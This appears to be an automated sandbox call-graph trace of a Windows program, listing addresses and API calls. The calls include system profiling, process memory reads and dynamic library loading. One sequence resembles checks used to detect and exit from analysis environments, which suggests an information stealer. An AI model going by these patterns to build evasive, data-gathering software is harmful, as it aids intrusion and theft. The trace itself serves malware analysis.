31178 4035b9 31177->31178 31179 404a60 34 API calls 31178->31179 31180 4035cf 31179->31180 31181 404a60 34 API calls 31180->31181 31182 4035e5 31181->31182 31183 404a60 34 API calls 31182->31183 31184 4035fe 31183->31184 31185 404a60 34 API calls 31184->31185 31186 403614 31185->31186 31187 404a60 34 API calls 31186->31187 31188 40362a 31187->31188 31189 404a60 34 API calls 31188->31189 31190 403640 31189->31190 31191 404a60 34 API calls 31190->31191 31192 403656 31191->31192 31193 404a60 34 API calls 31192->31193 31194 40366c 31193->31194 31195 404a60 34 API calls 31194->31195 31196 403685 31195->31196 31197 404a60 34 API calls 31196->31197 31198 40369b 31197->31198 31199 404a60 34 API calls 31198->31199 31200 4036b1 31199->31200 31201 404a60 34 API calls 31200->31201 31202 4036c7 31201->31202 31203 404a60 34 API calls 31202->31203 31204 4036dd 31203->31204 31205 404a60 34 API calls 31204->31205 31206 4036f3 31205->31206 31207 404a60 34 API calls 31206->31207 31208 40370c 31207->31208 31209 404a60 34 API calls 31208->31209 31210 403722 31209->31210 31211 404a60 34 API calls 31210->31211 31212 403738 31211->31212 31213 404a60 34 API calls 31212->31213 31214 40374e 31213->31214 31215 404a60 34 API calls 31214->31215 31216 403764 31215->31216 31217 404a60 34 API calls 31216->31217 31218 40377a 31217->31218 31219 404a60 34 API calls 31218->31219 31220 403793 31219->31220 31221 404a60 34 API calls 31220->31221 31222 4037a9 31221->31222 31223 404a60 34 API calls 31222->31223 31224 4037bf 31223->31224 31225 404a60 34 API calls 31224->31225 31226 4037d5 31225->31226 31227 404a60 34 API calls 31226->31227 31228 4037eb 31227->31228 31229 404a60 34 API calls 31228->31229 31230 403801 31229->31230 31231 404a60 34 API calls 31230->31231 31232 40381a 31231->31232 31233 404a60 34 API calls 31232->31233 31234 403830 31233->31234 31235 404a60 34 API calls 31234->31235 31236 403846 31235->31236 31237 404a60 34 API calls 31236->31237 31238 40385c 31237->31238 31239 404a60 34 API calls 31238->31239 31240 403872 31239->31240 31241 404a60 34 API calls 31240->31241 31242 403888 31241->31242 31243 404a60 34 API calls 31242->31243 31244 4038a1 31243->31244 31245 404a60 34 API calls 31244->31245 31246 4038b7 31245->31246 31247 404a60 34 API calls 31246->31247 31248 4038cd 31247->31248 31249 404a60 34 API calls 31248->31249 31250 4038e3 31249->31250 31251 404a60 34 API calls 31250->31251 31252 4038f9 31251->31252 31253 404a60 34 API calls 31252->31253 31254 40390f 31253->31254 31255 404a60 34 API calls 31254->31255 31256 403928 31255->31256 31257 404a60 34 API calls 31256->31257 31258 40393e 31257->31258 31259 404a60 34 API calls 31258->31259 31260 403954 31259->31260 31261 404a60 34 API calls 31260->31261 31262 40396a 31261->31262 31263 404a60 34 API calls 31262->31263 31264 403980 31263->31264 31265 404a60 34 API calls 31264->31265 31266 403996 31265->31266 31267 404a60 34 API calls 31266->31267 31268 4039af 31267->31268 31269 404a60 34 API calls 31268->31269 31270 4039c5 31269->31270 31271 404a60 34 API calls 31270->31271 31272 4039db 31271->31272 31273 404a60 34 API calls 31272->31273 31274 4039f1 31273->31274 31275 404a60 34 API calls 31274->31275 31276 403a07 31275->31276 31277 404a60 34 API calls 31276->31277 31278 403a1d 31277->31278 31279 404a60 34 API calls 31278->31279 31280 403a36 31279->31280 31281 404a60 34 API calls 31280->31281 31282 403a4c 31281->31282 31283 404a60 34 API calls 31282->31283 31284 403a62 31283->31284 31285 404a60 34 API calls 31284->31285 31286 403a78 31285->31286 31287 404a60 34 API calls 31286->31287 31288 403a8e 31287->31288 31289 404a60 34 API calls 31288->31289 31290 403aa4 31289->31290 31291 404a60 34 API calls 31290->31291 31292 403abd 31291->31292 31293 404a60 34 API calls 31292->31293 31294 403ad3 31293->31294 31295 404a60 34 API calls 31294->31295 31296 403ae9 31295->31296 31297 404a60 34 API calls 31296->31297 31298 403aff 31297->31298 31299 404a60 34 API calls 31298->31299 31300 403b15 31299->31300 31301 404a60 34 API calls 31300->31301 31302 403b2b 31301->31302 31303 404a60 34 API calls 31302->31303 31304 403b44 31303->31304 31305 404a60 34 API calls 31304->31305 31306 403b5a 31305->31306 31307 404a60 34 API calls 31306->31307 31308 403b70 31307->31308 31309 404a60 34 API calls 31308->31309 31310 403b86 31309->31310 31311 404a60 34 API calls 31310->31311 31312 403b9c 31311->31312 31313 404a60 34 API calls 31312->31313 31314 403bb2 31313->31314 31315 404a60 34 API calls 31314->31315 31316 403bcb 31315->31316 31317 404a60 34 API calls 31316->31317 31318 403be1 31317->31318 31319 404a60 34 API calls 31318->31319 31320 403bf7 31319->31320 31321 404a60 34 API calls 31320->31321 31322 403c0d 31321->31322 31323 404a60 34 API calls 31322->31323 31324 403c23 31323->31324 31325 404a60 34 API calls 31324->31325 31326 403c39 31325->31326 31327 404a60 34 API calls 31326->31327 31328 403c52 31327->31328 31329 404a60 34 API calls 31328->31329 31330 403c68 31329->31330 31331 404a60 34 API calls 31330->31331 31332 403c7e 31331->31332 31333 404a60 34 API calls 31332->31333 31334 403c94 31333->31334 31335 404a60 34 API calls 31334->31335 31336 403caa 31335->31336 31337 404a60 34 API calls 31336->31337 31338 403cc0 31337->31338 31339 404a60 34 API calls 31338->31339 31340 403cd9 31339->31340 31341 404a60 34 API calls 31340->31341 31342 403cef 31341->31342 31343 404a60 34 API calls 31342->31343 31344 403d05 31343->31344 31345 404a60 34 API calls 31344->31345 31346 403d1b 31345->31346 31347 404a60 34 API calls 31346->31347 31348 403d31 31347->31348 31349 404a60 34 API calls 31348->31349 31350 403d47 31349->31350 31351 404a60 34 API calls 31350->31351 31352 403d60 31351->31352 31353 404a60 34 API calls 31352->31353 31354 403d76 31353->31354 31355 404a60 34 API calls 31354->31355 31356 403d8c 31355->31356 31357 404a60 34 API calls 31356->31357 31358 403da2 31357->31358 31359 404a60 34 API calls 31358->31359 31360 403db8 31359->31360 31361 404a60 34 API calls 31360->31361 31362 403dce 31361->31362 31363 404a60 34 API calls 31362->31363 31364 403de7 31363->31364 31365 404a60 34 API calls 31364->31365 31366 403dfd 31365->31366 31367 404a60 34 API calls 31366->31367 31368 403e13 31367->31368 31369 404a60 34 API calls 31368->31369 31370 403e29 31369->31370 31371 404a60 34 API calls 31370->31371 31372 403e3f 31371->31372 31373 404a60 34 API calls 31372->31373 31374 403e55 31373->31374 31375 404a60 34 API calls 31374->31375 31376 403e6e 31375->31376 31377 404a60 34 API calls 31376->31377 31378 403e84 31377->31378 31379 404a60 34 API calls 31378->31379 31380 403e9a 31379->31380 31381 404a60 34 API calls 31380->31381 31382 403eb0 31381->31382 31383 404a60 34 API calls 31382->31383 31384 403ec6 31383->31384 31385 404a60 34 API calls 31384->31385 31386 403edc 31385->31386 31387 404a60 34 API calls 31386->31387 31388 403ef5 31387->31388 31389 404a60 34 API calls 31388->31389 31390 403f0b 31389->31390 31391 404a60 34 API calls 31390->31391 31392 403f21 31391->31392 31393 404a60 34 API calls 31392->31393 31394 403f37 31393->31394 31395 404a60 34 API calls 31394->31395 31396 403f4d 31395->31396 31397 404a60 34 API calls 31396->31397 31398 403f63 31397->31398 31399 404a60 34 API calls 31398->31399 31400 403f7c 31399->31400 31401 404a60 34 API calls 31400->31401 31402 403f92 31401->31402 31403 404a60 34 API calls 31402->31403 31404 403fa8 31403->31404 31405 404a60 34 API calls 31404->31405 31406 403fbe 31405->31406 31407 404a60 34 API calls 31406->31407 31408 403fd4 31407->31408 31409 404a60 34 API calls 31408->31409 31410 403fea 31409->31410 31411 404a60 34 API calls 31410->31411 31412 404003 31411->31412 31413 404a60 34 API calls 31412->31413 31414 404019 31413->31414 31415 404a60 34 API calls 31414->31415 31416 40402f 31415->31416 31417 404a60 34 API calls 31416->31417 31418 404045 31417->31418 31419 404a60 34 API calls 31418->31419 31420 40405b 31419->31420 31421 404a60 34 API calls 31420->31421 31422 404071 31421->31422 31423 404a60 34 API calls 31422->31423 31424 40408a 31423->31424 31425 404a60 34 API calls 31424->31425 31426 4040a0 31425->31426 31427 404a60 34 API calls 31426->31427 31428 4040b6 31427->31428 31429 404a60 34 API calls 31428->31429 31430 4040cc 31429->31430 31431 404a60 34 API calls 31430->31431 31432 4040e2 31431->31432 31433 404a60 34 API calls 31432->31433 31434 4040f8 31433->31434 31435 404a60 34 API calls 31434->31435 31436 404111 31435->31436 31437 404a60 34 API calls 31436->31437 31438 404127 31437->31438 31439 404a60 34 API calls 31438->31439 31440 40413d 31439->31440 31441 404a60 34 API calls 31440->31441 31442 404153 31441->31442 31443 404a60 34 API calls 31442->31443 31444 404169 31443->31444 31445 404a60 34 API calls 31444->31445 31446 40417f 31445->31446 31447 404a60 34 API calls 31446->31447 31448 404198 31447->31448 31449 404a60 34 API calls 31448->31449 31450 4041ae 31449->31450 31451 404a60 34 API calls 31450->31451 31452 4041c4 31451->31452 31453 404a60 34 API calls 31452->31453 31454 4041da 31453->31454 31455 404a60 34 API calls 31454->31455 31456 4041f0 31455->31456 31457 404a60 34 API calls 31456->31457 31458 404206 31457->31458 31459 404a60 34 API calls 31458->31459 31460 40421f 31459->31460 31461 404a60 34 API calls 31460->31461 31462 404235 31461->31462 31463 404a60 34 API calls 31462->31463 31464 40424b 31463->31464 31465 404a60 34 API calls 31464->31465 31466 404261 31465->31466 31467 404a60 34 API calls 31466->31467 31468 404277 31467->31468 31469 404a60 34 API calls 31468->31469 31470 40428d 31469->31470 31471 404a60 34 API calls 31470->31471 31472 4042a6 31471->31472 31473 404a60 34 API calls 31472->31473 31474 4042bc 31473->31474 31475 404a60 34 API calls 31474->31475 31476 4042d2 31475->31476 31477 404a60 34 API calls 31476->31477 31478 4042e8 31477->31478 31479 404a60 34 API calls 31478->31479 31480 4042fe 31479->31480 31481 404a60 34 API calls 31480->31481 31482 404314 31481->31482 31483 404a60 34 API calls 31482->31483 31484 40432d 31483->31484 31485 404a60 34 API calls 31484->31485 31486 404343 31485->31486 31487 404a60 34 API calls 31486->31487 31488 404359 31487->31488 31489 404a60 34 API calls 31488->31489 31490 40436f 31489->31490 31491 404a60 34 API calls 31490->31491 31492 404385 31491->31492 31493 404a60 34 API calls 31492->31493 31494 40439b 31493->31494 31495 404a60 34 API calls 31494->31495 31496 4043b4 31495->31496 31497 404a60 34 API calls 31496->31497 31498 4043ca 31497->31498 31499 404a60 34 API calls 31498->31499 31500 4043e0 31499->31500 31501 404a60 34 API calls 31500->31501 31502 4043f6 31501->31502 31503 404a60 34 API calls 31502->31503 31504 40440c 31503->31504 31505 404a60 34 API calls 31504->31505 31506 404422 31505->31506 31507 404a60 34 API calls 31506->31507 31508 40443b 31507->31508 31509 404a60 34 API calls 31508->31509 31510 404451 31509->31510 31511 404a60 34 API calls 31510->31511 31512 404467 31511->31512 31513 404a60 34 API calls 31512->31513 31514 40447d 31513->31514 31515 404a60 34 API calls 31514->31515 31516 404493 31515->31516 31517 404a60 34 API calls 31516->31517 31518 4044a9 31517->31518 31519 404a60 34 API calls 31518->31519 31520 4044c2 31519->31520 31521 404a60 34 API calls 31520->31521 31522 4044d8 31521->31522 31523 404a60 34 API calls 31522->31523 31524 4044ee 31523->31524 31525 404a60 34 API calls 31524->31525 31526 404504 31525->31526 31527 404a60 34 API calls 31526->31527 31528 40451a 31527->31528 31529 404a60 34 API calls 31528->31529 31530 404530 31529->31530 31531 404a60 34 API calls 31530->31531 31532 404549 31531->31532 31533 404a60 34 API calls 31532->31533 31534 40455f 31533->31534 31535 404a60 34 API calls 31534->31535 31536 404575 31535->31536 31537 404a60 34 API calls 31536->31537 31538 40458b 31537->31538 31539 404a60 34 API calls 31538->31539 31540 4045a1 31539->31540 31541 404a60 34 API calls 31540->31541 31542 4045b7 31541->31542 31543 404a60 34 API calls 31542->31543 31544 4045d0 31543->31544 31545 404a60 34 API calls 31544->31545 31546 4045e6 31545->31546 31547 404a60 34 API calls 31546->31547 31548 4045fc 31547->31548 31549 404a60 34 API calls 31548->31549 31550 404612 31549->31550 31551 404a60 34 API calls 31550->31551 31552 404628 31551->31552 31553 404a60 34 API calls 31552->31553 31554 40463e 31553->31554 31555 404a60 34 API calls 31554->31555 31556 404657 31555->31556 31557 404a60 34 API calls 31556->31557 31558 40466d 31557->31558 31559 404a60 34 API calls 31558->31559 31560 404683 31559->31560 31561 404a60 34 API calls 31560->31561 31562 404699 31561->31562 31563 404a60 34 API calls 31562->31563 31564 4046af 31563->31564 31565 404a60 34 API calls 31564->31565 31566 4046c5 31565->31566 31567 404a60 34 API calls 31566->31567 31568 4046de 31567->31568 31569 404a60 34 API calls 31568->31569 31570 4046f4 31569->31570 31571 404a60 34 API calls 31570->31571 31572 40470a 31571->31572 31573 404a60 34 API calls 31572->31573 31574 404720 31573->31574 31575 404a60 34 API calls 31574->31575 31576 404736 31575->31576 31577 404a60 34 API calls 31576->31577 31578 40474c 31577->31578 31579 404a60 34 API calls 31578->31579 31580 404765 31579->31580 31581 404a60 34 API calls 31580->31581 31582 40477b 31581->31582 31583 404a60 34 API calls 31582->31583 31584 404791 31583->31584 31585 404a60 34 API calls 31584->31585 31586 4047a7 31585->31586 31587 404a60 34 API calls 31586->31587 31588 4047bd 31587->31588 31589 404a60 34 API calls 31588->31589 31590 4047d3 31589->31590 31591 404a60 34 API calls 31590->31591 31592 4047ec 31591->31592 31593 404a60 34 API calls 31592->31593 31594 404802 31593->31594 31595 404a60 34 API calls 31594->31595 31596 404818 31595->31596 31597 404a60 34 API calls 31596->31597 31598 40482e 31597->31598 31599 404a60 34 API calls 31598->31599 31600 404844 31599->31600 31601 404a60 34 API calls 31600->31601 31602 40485a 31601->31602 31603 404a60 34 API calls 31602->31603 31604 404873 31603->31604 31605 404a60 34 API calls 31604->31605 31606 404889 31605->31606 31607 404a60 34 API calls 31606->31607 31608 40489f 31607->31608 31609 404a60 34 API calls 31608->31609 31610 4048b5 31609->31610 31611 404a60 34 API calls 31610->31611 31612 4048cb 31611->31612 31613 404a60 34 API calls 31612->31613 31614 4048e1 31613->31614 31615 404a60 34 API calls 31614->31615 31616 4048fa 31615->31616 31617 404a60 34 API calls 31616->31617 31618 404910 31617->31618 31619 404a60 34 API calls 31618->31619 31620 404926 31619->31620 31621 404a60 34 API calls 31620->31621 31622 40493c 31621->31622 31623 404a60 34 API calls 31622->31623 31624 404952 31623->31624 31625 404a60 34 API calls 31624->31625 31626 404968 31625->31626 31627 404a60 34 API calls 31626->31627 31628 404981 31627->31628 31629 404a60 34 API calls 31628->31629 31630 404997 31629->31630 31631 404a60 34 API calls 31630->31631 31632 4049ad 31631->31632 31633 404a60 34 API calls 31632->31633 31634 4049c3 31633->31634 31635 404a60 34 API calls 31634->31635 31636 4049d9 31635->31636 31637 404a60 34 API calls 31636->31637 31638 4049ef 31637->31638 31639 404a60 34 API calls 31638->31639 31640 404a08 31639->31640 31641 404a60 34 API calls 31640->31641 31642 404a1e 31641->31642 31643 404a60 34 API calls 31642->31643 31644 404a34 31643->31644 31645 404a60 34 API calls 31644->31645 31646 404a4a 31645->31646 31648 404b7a 6 API calls 31647->31648 31649 404afe 31647->31649 31648->31016 31650 404b06 11 API calls 31649->31650 31650->31648 31650->31650 32006 40b870 51 API calls 32007 409c70 18 API calls 32129 409770 99 API calls 32008 425c70 11 API calls 32130 422b70 GetCurrentProcess IsWow64Process 32131 2c7f9f0 139 API calls 32009 2c84ef0 298 API calls 32010 408c79 ??2@YAPAXI strlen malloc strcpy_s RaiseException 32045 2c99bf0 SetUnhandledExceptionFilter 32046 2c937f7 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 32091 2c940f7 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 32092 2c948f7 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 32047 405900 54 API calls 32048 2c99b88 167 API calls __setmbcp 32134 407702 free 32093 2c92c8a lstrcpy 32094 2c8c48d 11 API calls 32011 2c8ca8f 17 API calls 32135 2c952ac 16 API calls 31985 2d6cc9e 31986 2d6ccad 31985->31986 31989 2d6d43e 31986->31989 31990 2d6d459 31989->31990 31991 2d6d462 CreateToolhelp32Snapshot 31990->31991 31992 2d6d47e Module32First 31990->31992 31991->31990 31991->31992 31993 2d6ccb6 31992->31993 31994 2d6d48d 31992->31994 31996 2d6d0fd 31994->31996 31997 2d6d128 31996->31997 31998 2d6d139 VirtualAlloc 31997->31998 31999 2d6d171 31997->31999 31998->31999 32012 2c98687 RtlUnwind 32013 40a010 12 API calls 31793 422910 GetWindowsDirectoryA 31794 422955 31793->31794 31795 42295c GetVolumeInformationA 31793->31795 31794->31795 31796 4229bc GetProcessHeap HeapAlloc 31795->31796 31798 4229f6 wsprintfA 31796->31798 31799 4229f2 31796->31799 31798->31799 31802 4273f0 lstrcpy 31799->31802 31801 422a30 31802->31801 32095 424210 GetFileAttributesA 32096 2c8e490 140 API calls 32138 2c80590 120 API calls 32097 2c98c90 42 API calls __calloc_crt 32015 2c92667 ReadProcessMemory ReadProcessMemory VirtualQueryEx ??_V@YAXPAX 32051 2c92f97 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 32141 2c93197 11 API calls 32098 408e20 strlen malloc strcpy_s free std::_Xinvalid_argument 32016 418020 7 API calls 32100 2c8c4af 15 API calls 32143 2c7c1a0 170 API calls 32054 2c99ba5 41 API calls __amsg_exit 32056 417d30 11 API calls 32102 2c8c8b0 ShellExecuteEx 32146 2c8cd3e StrCmpCA StrCmpCA StrCmpCA strtok_s 32018 2c936b7 7 API calls 32103 2c938b7 6 API calls 32104 2c92cb7 10 API calls 32147 407bc0 101 API calls 32148 408fc0 21 API calls 31803 421dc0 31833 402a90 31803->31833 31807 421dd3 31808 421e3d GetSystemInfo 31807->31808 31809 421e55 31808->31809 31934 401030 GetCurrentProcess VirtualAllocExNuma 31809->31934 31814 421e88 31946 422ca0 GetProcessHeap HeapAlloc GetComputerNameA 31814->31946 31816 421e8d 31817 421eb7 lstrlenA 31816->31817 31818 421ecf 31817->31818 31819 421ef3 lstrlenA 31818->31819 31820 421f09 31819->31820 31821 422ca0 3 API calls 31820->31821 31822 421f2f lstrlenA 31821->31822 31823 421f44 31822->31823 31824 421f6a lstrlenA 31823->31824 31825 421f80 31824->31825 31948 422c10 GetProcessHeap HeapAlloc GetUserNameA 31825->31948 31827 421fa3 lstrlenA 31828 421fb7 31827->31828 31829 422026 OpenEventA 31828->31829 31830 42205c CreateEventA 31829->31830 31949 421cf0 GetSystemTime 31830->31949 31832 422070 31834 404a60 34 API calls 31833->31834 31835 402aa1 31834->31835 31836 404a60 34 API calls 31835->31836 31837 402ab7 31836->31837 31838 404a60 34 API calls 31837->31838 31839 402acd 31838->31839 31840 404a60 34 API calls 31839->31840 31841 402ae3 31840->31841 31842 404a60 34 API calls 31841->31842 31843 402af9 31842->31843 31844 404a60 34 API calls 31843->31844 31845 402b0f 31844->31845 31846 404a60 34 API calls 31845->31846 31847 402b28 31846->31847 31848 404a60 34 API calls 31847->31848 31849 402b3e 31848->31849 31850 404a60 34 API calls 31849->31850 31851 402b54 31850->31851 31852 404a60 34 API calls 31851->31852 31853 402b6a 31852->31853 31854 404a60 34 API calls 31853->31854 31855 402b80 31854->31855 31856 404a60 34 API calls 31855->31856 31857 402b96 31856->31857 31858 404a60 34 API calls 31857->31858 31859 402baf 31858->31859 31860 404a60 34 API calls 31859->31860 31861 402bc5 31860->31861 31862 404a60 34 API calls 31861->31862 31863 402bdb 31862->31863 31864 404a60 34 API calls 31863->31864 31865 402bf1 31864->31865 31866 404a60 34 API calls 31865->31866 31867 402c07 31866->31867 31868 404a60 34 API calls 31867->31868 31869 402c1d 31868->31869 31870 404a60 34 API calls 31869->31870 31871 402c36 31870->31871 31872 404a60 34 API calls 31871->31872 31873 402c4c 31872->31873 31874 404a60 34 API calls 31873->31874 31875 402c62 31874->31875 31876 404a60 34 API calls 31875->31876 31877 402c78 31876->31877 31878 404a60 34 API calls 31877->31878 31879 402c8e 31878->31879 31880 404a60 34 API calls 31879->31880 31881 402ca4 31880->31881 31882 404a60 34 API calls 31881->31882 31883 402cbd 31882->31883 31884 404a60 34 API calls 31883->31884 31885 402cd3 31884->31885 31886 404a60 34 API calls 31885->31886 31887 402ce9 31886->31887 31888 404a60 34 API calls 31887->31888 31889 402cff 31888->31889 31890 404a60 34 API calls 31889->31890 31891 402d15 31890->31891 31892 404a60 34 API calls 31891->31892 31893 402d2b 31892->31893 31894 404a60 34 API calls 31893->31894 31895 402d44 31894->31895 31896 404a60 34 API calls 31895->31896 31897 402d5a 31896->31897 31898 404a60 34 API calls 31897->31898 31899 402d70 31898->31899 31900 404a60 34 API calls 31899->31900 31901 402d86 31900->31901 31902 404a60 34 API calls 31901->31902 31903 402d9c 31902->31903 31904 404a60 34 API calls 31903->31904 31905 402db2 31904->31905 31906 404a60 34 API calls 31905->31906 31907 402dcb 31906->31907 31908 404a60 34 API calls 31907->31908 31909 402de1 31908->31909 31910 404a60 34 API calls 31909->31910 31911 402df7 31910->31911 31912 404a60 34 API calls 31911->31912 31913 402e0d 31912->31913 31914 404a60 34 API calls 31913->31914 31915 402e23 31914->31915 31916 404a60 34 API calls 31915->31916 31917 402e39 31916->31917 31918 404a60 34 API calls 31917->31918 31919 402e52 31918->31919 31920 4265a0 GetPEB 31919->31920 31921 4267d3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 31920->31921 31922 4265d3 31920->31922 31923 426835 GetProcAddress 31921->31923 31924 426848 31921->31924 31931 4265e7 20 API calls 31922->31931 31923->31924 31925 426851 GetProcAddress GetProcAddress 31924->31925 31926 42687c 31924->31926 31925->31926 31927 426885 GetProcAddress 31926->31927 31928 426898 31926->31928 31927->31928 31929 4268a1 GetProcAddress 31928->31929 31930 4268b4 31928->31930 31929->31930 31932 4268e7 31930->31932 31933 4268bd GetProcAddress GetProcAddress 31930->31933 31931->31921 31932->31807 31933->31932 31935 401057 ExitProcess 31934->31935 31936 40105e VirtualAlloc 31934->31936 31937 40107d 31936->31937 31938 4010b1 31937->31938 31939 40108a VirtualFree 31937->31939 31940 4010c0 31938->31940 31939->31938 31941 4010d0 GlobalMemoryStatusEx 31940->31941 31943 401112 ExitProcess 31941->31943 31944 4010f5 31941->31944 31944->31943 31945 40111a GetUserDefaultLangID 31944->31945 31945->31814 31947 422cf4 31946->31947 31947->31816 31948->31827 31957 4219f0 25 API calls 31949->31957 31951 421d51 sscanf 31958 402a20 31951->31958 31954 421db9 31954->31832 31955 421db2 ExitProcess 31956 421da6 31956->31954 31956->31955 31957->31951 31959 402a24 SystemTimeToFileTime SystemTimeToFileTime 31958->31959 31959->31954 31959->31956 32105 4242c0 CryptBinaryToStringA GetProcessHeap HeapAlloc CryptBinaryToStringA 32022 2c8cd3e 11 API calls 32149 2c8e540 133 API calls 32059 2c882bc strtok_s StrCmpCA 32108 2c93047 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 32024 4060d0 82 API calls 32109 406ad0 16 API calls 32110 2c81c57 166 API calls 32026 4024e0 50 API calls 32062 409de0 10 API calls 32063 2c8af69 114 API calls 32027 2c7be60 84 API calls 32064 2c7df6e 529 API calls 32065 2c8858e lstrcpy strtok_s strtok_s strtok_s 32111 2c96064 memmove RaiseException __CxxThrowException@8 32154 2c93567 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 31651 418df0 StrCmpCA 31652 418e16 ExitProcess 31651->31652 31653 418e1d strtok_s 31651->31653 31654 419032 31653->31654 31669 418e3c 31653->31669 31655 419013 strtok_s 31655->31654 31655->31669 31656 418e80 lstrlenA 31656->31669 31657 418fa6 StrCmpCA 31657->31655 31657->31669 31658 418eaa lstrlenA 31658->31669 31659 418f0d StrCmpCA 31659->31655 31659->31669 31660 418f2d StrCmpCA 31660->31655 31660->31669 31661 418f4d StrCmpCA 31661->31655 31661->31669 31662 418f6d StrCmpCA 31662->31655 31662->31669 31663 418f8d StrCmpCA 31663->31655 31663->31669 31664 418ed4 StrCmpCA 31664->31655 31664->31669 31665 418ef4 StrCmpCA 31665->31655 31666 418e56 lstrlenA 31666->31669 31667 418fd8 lstrlenA 31667->31669 31668 418fbf StrCmpCA 31668->31655 31668->31669 31669->31655 31669->31656 31669->31657 31669->31658 31669->31659 31669->31660 31669->31661 31669->31662 31669->31663 31669->31664 31669->31665 31669->31666 31669->31667 31669->31668 31670 41900b lstrcpy 31669->31670 31670->31655 32112 4182f0 12 API calls 31766 4268f0 31767 426d0e 8 API calls 31766->31767 31768 4268fd 43 API calls 31766->31768 31769 426da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31767->31769 31770 426e18 31767->31770 31768->31767 31769->31770 31771 426ee2 31770->31771 31772 426e25 8 API calls 31770->31772 31773 426eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31771->31773 31774 426f5f 31771->31774 31772->31771 31773->31774 31775 426ff9 31774->31775 31776 426f6c 6 API calls 31774->31776 31777 427120 31775->31777 31778 427006 12 API calls 31775->31778 31776->31775 31779 427129 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31777->31779 31780 42719d 31777->31780 31778->31777 31779->31780 31781 4271d1 31780->31781 31782 4271a6 GetProcAddress GetProcAddress 31780->31782 31783 427205 31781->31783 31784 4271da GetProcAddress GetProcAddress 31781->31784 31782->31781 31785 427212 10 API calls 31783->31785 31786 4272fd 31783->31786 31784->31783 31785->31786 31787 427362 31786->31787 31788 427306 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31786->31788 31789 42736b GetProcAddress 31787->31789 31790 42737e 31787->31790 31788->31787 31789->31790 31791 4273e3 31790->31791 31792 427387 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31790->31792 31792->31791 32113 406ef2 memcpy memcpy GetProcessHeap HeapAlloc memcpy 32155 425bf0 12 API calls 32114 2c8cc7d strtok_s lstrcpy lstrcpy strtok_s 32156 2c7b570 92 API calls 32157 40bbf9 21 API calls 31960 2c70005 31965 2c7092b GetPEB 31960->31965 31962 2c70030 31966 2c7003c 31962->31966 31965->31962 31967 2c70049 31966->31967 31979 2c70e0f SetErrorMode SetErrorMode 31967->31979 31972 2c70265 31973 2c702ce VirtualProtect 31972->31973 31974 2c7030b 31973->31974 31975 2c70439 VirtualFree 31974->31975 31978 2c704be LoadLibraryA 31975->31978 31977 2c708c7 31978->31977 31980 2c70223 31979->31980 31981 2c70d90 31980->31981 31982 2c70dad 31981->31982 31983 2c70238 VirtualAlloc 31982->31983 31984 2c70dbb GetPEB 31982->31984 31983->31972 31984->31983 32160 2c93107 GetUserDefaultLocaleName LocalAlloc CharToOemW 31671 41f390 lstrlenA 31672 41f3c4 31671->31672 31673 41f3d7 lstrlenA 31672->31673 31674 41f3cb lstrcpy 31672->31674 31675 41f3e8 31673->31675 31674->31673 31676 41f3fb lstrlenA 31675->31676 31677 41f3ef lstrcpy 31675->31677 31678 41f40c 31676->31678 31677->31676 31679 41f413 lstrcpy 31678->31679 31680 41f41f 31678->31680 31679->31680 31681 41f438 lstrcpy 31680->31681 31682 41f444 31680->31682 31681->31682 31683 41f466 lstrcpy 31682->31683 31684 41f472 31682->31684 31683->31684 31685 41f49a lstrcpy 31684->31685 31686 41f4a6 31684->31686 31685->31686 31687 41f4ca lstrcpy 31686->31687 31737 41f4e0 31686->31737 31687->31737 31688 41f4ec lstrlenA 31688->31737 31689 41f699 lstrcpy 31689->31737 31690 41f581 lstrcpy 31690->31737 31691 41f6c8 lstrcpy 31752 41f6d0 31691->31752 31692 41f5a5 lstrcpy 31692->31737 31693 41f659 lstrcpy 31693->31737 31694 41f77c lstrcpy 31694->31752 31695 41f8ef StrCmpCA 31700 42006e 31695->31700 31695->31737 31696 41f7f6 StrCmpCA 31696->31695 31696->31752 31697 41fc09 StrCmpCA 31709 42000b 31697->31709 31697->31737 31698 41f91e lstrlenA 31698->31737 31699 41ff2d StrCmpCA 31703 41ff40 Sleep 31699->31703 31716 41ff55 31699->31716 31701 42008d lstrlenA 31700->31701 31702 420085 lstrcpy 31700->31702 31707 4200a7 31701->31707 31702->31701 31703->31737 31704 41fc38 lstrlenA 31704->31737 31705 41f82a lstrcpy 31705->31752 31706 401530 8 API calls 31706->31752 31714 4200c7 lstrlenA 31707->31714 31719 4200bf lstrcpy 31707->31719 31708 42002a lstrlenA 31713 420044 31708->31713 31709->31708 31711 420022 lstrcpy 31709->31711 31710 41fa7e lstrcpy 31710->31737 31711->31708 31712 41f94f lstrcpy 31712->31737 31721 41ffae lstrlenA 31713->31721 31723 42005c lstrcpy 31713->31723 31722 4200e1 31714->31722 31715 41ff74 lstrlenA 31727 41ff8e 31715->31727 31716->31715 31717 41ff6c lstrcpy 31716->31717 31717->31715 31718 41fd98 lstrcpy 31718->31737 31719->31714 31720 41fc69 lstrcpy 31720->31737 31734 41ffc8 31721->31734 31728 420101 31722->31728 31735 4200f9 lstrcpy 31722->31735 31723->31721 31724 41f971 lstrcpy 31724->31737 31726 41faad lstrcpy 31726->31752 31727->31721 31731 41ffa6 lstrcpy 31727->31731 31736 401610 4 API calls 31728->31736 31729 41fc8b lstrcpy 31729->31737 31730 41f878 lstrcpy 31730->31752 31731->31721 31732 401530 8 API calls 31732->31737 31733 41fdc7 lstrcpy 31733->31752 31739 41ffe8 31734->31739 31741 41ffe0 lstrcpy 31734->31741 31735->31728 31755 41fff3 31736->31755 31737->31688 31737->31689 31737->31690 31737->31691 31737->31692 31737->31693 31737->31695 31737->31697 31737->31698 31737->31699 31737->31704 31737->31710 31737->31712 31737->31718 31737->31720 31737->31724 31737->31726 31737->31729 31737->31732 31737->31733 31738 41f070 28 API calls 31737->31738 31743 41f9c2 lstrcpy 31737->31743 31746 41fcdc lstrcpy 31737->31746 31737->31752 31738->31737 31756 401610 